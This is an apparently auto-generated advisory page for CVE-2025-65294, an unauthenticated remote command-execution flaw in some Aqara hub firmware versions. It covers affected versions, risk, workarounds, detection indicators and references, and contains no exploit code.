CVE-2025-65294 – Aqara Hub devices contain an undocumented remot... (How to Fix)

Q: What is the severity of CVE-2025-65294?

CVE-2025-65294 has a CVSS score of 9.8 (CRITICAL). Aqara Hub devices contain an undocumented remote access mechanism that allows attackers to execute arbitrary commands without authentication. This vulnerability affects Aqara Camera Hub G3, Hub M2, and Hub M3 devices running specific vulnerable firmware versions. Attackers can gain complete control over affected devices remotely.

📋 TL;DR

Aqara Hub devices contain an undocumented remote access mechanism that allows attackers to execute arbitrary commands without authentication. This vulnerability affects Aqara Camera Hub G3, Hub M2, and Hub M3 devices running specific vulnerable firmware versions. Attackers can gain complete control over affected devices remotely.

💻 Affected Systems

Products:

Aqara Camera Hub G3
Aqara Hub M2
Aqara Hub M3

Versions: Camera Hub G3: 4.1.9_0027, Hub M2: 4.3.6_0027, Hub M3: 4.3.6_0025

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: All devices running these specific firmware versions are vulnerable by default. No special configuration required.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install malware, pivot to internal networks, steal sensitive data, or use devices as botnet nodes.

🟠

Likely Case

Remote attackers gaining full control of devices to monitor camera feeds, manipulate smart home devices, or use devices for DDoS attacks.

🟢

If Mitigated

Limited impact if devices are isolated from internet and internal networks with strict network segmentation.

🌐 Internet-Facing: HIGH - Devices are typically internet-connected smart home hubs with no authentication required for exploitation.

🏢 Internal Only: HIGH - Even internally, the vulnerability allows unauthenticated remote command execution.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public GitHub repositories contain detailed exploitation techniques. The vulnerability requires no authentication and has simple exploitation steps.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None known

Restart Required: No

Instructions:

No official patch available. Monitor Aqara security advisories for updates. Check device firmware updates through Aqara app.

🔧 Temporary Workarounds

Network Isolation

all

Isolate Aqara Hub devices from internet and internal networks using VLANs or separate network segments.

Firewall Restrictions

all

Block all inbound traffic to Aqara Hub devices except from authorized management systems.

🧯 If You Can't Patch

Immediately disconnect vulnerable devices from internet and internal networks
Replace vulnerable devices with patched versions or alternative products

🔍 How to Verify

Check if Vulnerable:

Check firmware version in Aqara app: Settings > About > Firmware Version. Compare against affected versions.

Check Version:

No CLI command available. Use Aqara mobile app to check firmware version.

Verify Fix Applied:

Verify firmware version has been updated to a version not listed in affected systems.

📡 Detection & Monitoring

Log Indicators:

Unusual command execution logs
Unexpected process creation
Network connections to suspicious external IPs

Network Indicators:

Unexpected outbound connections from hub devices
Traffic to known malicious IPs
Unusual protocol usage on hub ports

SIEM Query:

source="aqara_hub" AND (event_type="command_execution" OR process_name NOT IN ["normal_processes"])

📊 Metadata

CVE ID: CVE-2025-65294

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

EPSS Score: 0.97% exploit probability (76.2th percentile)

Published: December 10, 2025

Last Updated: December 17, 2025

🔗 References

https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/QR-Command-Injection.md Not Applicable
https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/Undocumented-Remote-Execution.md Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-65294, you might also want to check these: